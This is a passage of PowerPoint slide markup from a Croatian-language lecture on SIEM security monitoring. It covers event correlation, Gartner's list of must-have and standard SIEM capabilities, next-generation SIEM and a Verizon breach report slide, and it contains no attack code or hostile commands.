                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Korelacija </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="vi-VN" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>omogućava pronalazak povezanosti između dva ili više sigurnosnih događaja</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Najčešće se provodi kroz pravila koja definiraju uvjete povezivanja</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nije ograničena na jednostavna pravila već se mogu koristiti i statističke metode i vizualizacija</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primjer: Korelacija između otkrivenih ranjivosti na sustavu i detektiranih pokušaja upada u sustav</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Primjer: Nasumično pokušavanje </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ulogiravanja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t> u više sustava</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nedostatci</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Iznimno kompleksno za podešavanje</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unaprijed se definiraju pravila</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="262626"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vrlo statično</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="hr-HR" altLang="sr-Latn-RS" dirty="0">
              <a:solidFill>
                <a:srgbClr val="262626"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="TextBox 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A56F20C2-F8DA-44B6-9997-CB928709EDF2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="539552" y="2276872"/>
            <a:ext cx="8335838" cy="2554545"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Machine</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" sz="8000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>learning</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" sz="8000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> jedino rješenje</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="51200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A3AA-4994-46A8-B1E3-BBFED2FD4C03}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Gartnerov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> komentar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{417A9C46-48AF-41EB-9D72-0C06B52AD0A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>… </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>greater weight on capabilities that aid in targeted attack detection, including support for user activity monitoring, application activity monitoring, profiling and anomaly detection, threat intelligence, effective analytics, and incident response features</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1057937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gure 1: Y23Q2 Magic Quadrant for Security Information and Event Management">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{99458A02-4A14-927D-A317-3934DCC5F3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34214" y="68263"/>
            <a:ext cx="5875573" cy="6102350"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFFFF"/>
          </a:solid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395F7-54C6-00AF-4C7D-06CFB6B4C4A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Must-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Have</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Graphik"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Capabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hr-HR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Graphik"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7B1EE3B-A8DD-B7D6-6E42-27A6F5D3D675}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Collection of infrastructure details and security-relevant data from a wide range of assets located on-premises and/or in cloud infrastructure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Ability for end-users to self-develop, modify and maintain threat detection use cases utilizing correlation-, analytic- and signature-based methods.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Provide SIEM vendor content and facility for client-created content, in areas including: analytics, data normalization, collection and enrichment.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Provision of case management and support of incident response activities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="70000"/>
              </a:lnSpc>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0"/>
              <a:t>Report generations to support business, compliance and audit needs as needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="16934460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D8E0-685A-B4EF-A4E5-DC2419AB6BE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Standard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Graphik"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Capabilities</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="hr-HR" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Graphik"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CC4C8F0D-B4DB-C127-26A7-DE0A1FC9C189}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Storing of essential security event data long term and making it available for searching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow for the collection of event data from disparate event sources, using multiple mechanisms (log stream, API, file processing) for the purposes of threat detection use cases, reporting and incident investigation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Multiple deployment options to include on-premises, cloud-hosted, cloud-native or SaaS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normalization, enrichment and risk-score data from third-party systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Orchestration and automation of tasks and workflows to enhance investigations and limit the impact of incidents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Fully featured security orchestration automation response (SOAR) functionality</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Advanced analytic capabilities using user entity behavior analytics (UEBA), data sciences (i.e., supervised and unsupervised machine learning, deep learning/recurrent neural networks)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Threat intelligence platform (TIP) capabilities to manage intelligence and supply contextual information about threats</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2914559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76477ADB-DF6C-4667-AD3A-0EA74C05974A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="929019" y="1825625"/>
            <a:ext cx="7285961" cy="4351338"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA4A998F-06B5-4F62-883E-ED69E5CBD32B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1763688" y="727825"/>
            <a:ext cx="4533613" cy="600164"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" sz="3300" b="1" dirty="0"/>
              <a:t>Next </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" sz="3300" b="1" dirty="0" err="1"/>
              <a:t>generation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" sz="3300" b="1" dirty="0"/>
              <a:t> SIEM</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="794778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32A7-23FF-9571-E0EA-BC81576AAD97}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t>Verizon Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Breach</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0" err="1"/>
              <a:t>Report</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hr-HR" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BB79F7C-6BEC-46AE-1414-A4B144C6AE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628650" y="1825625"/>
            <a:ext cx="4015358" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> the Actor disclosure variety corresponds to 96% of all our discovery methods</a:t>
            </a:r>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="hr-HR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F5A19FA2-2292-E1C1-2E14-6C042529AF62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5292080" y="1484784"/>
            <a:ext cx="2491956" cy="4427604"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2104568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2A90D-824E-7A82-1620-BEAB8C334C31}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="hr-HR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Content Placeholder 3" descr="A screenshot of a cell phone&#10;&#10;Description generated with very high confidence">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A7E895F-0F6B-4A7F-A77E-793790EB9717}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1019175" y="2110581"/>
            <a:ext cx="7105650" cy="3781425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8D85DB38-61F4-4427-9250-18ECC8B011F0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="8091476" cy="3429000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4046A127-C673-4A1E-A8E6-1F9AC75F2AC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1969203"/>
            <a:ext cx="8663242" cy="4628149"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1768673-028C-4AC5-93B9-59D7652302CD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="107504" y="0"/>
            <a:ext cx="8791171" cy="4731892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEA22703-0B8E-457E-A04A-32E3C1493AF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="480759" y="2102934"/>
            <a:ext cx="8322534" cy="4295863"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C49AC88-5625-41E4-A76C-4E9BF57C4AA3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2788605"/>
            <a:ext cx="8178799" cy="3984825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6DB7791A-F4AD-4094-A9A5-338EE8CD2262}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
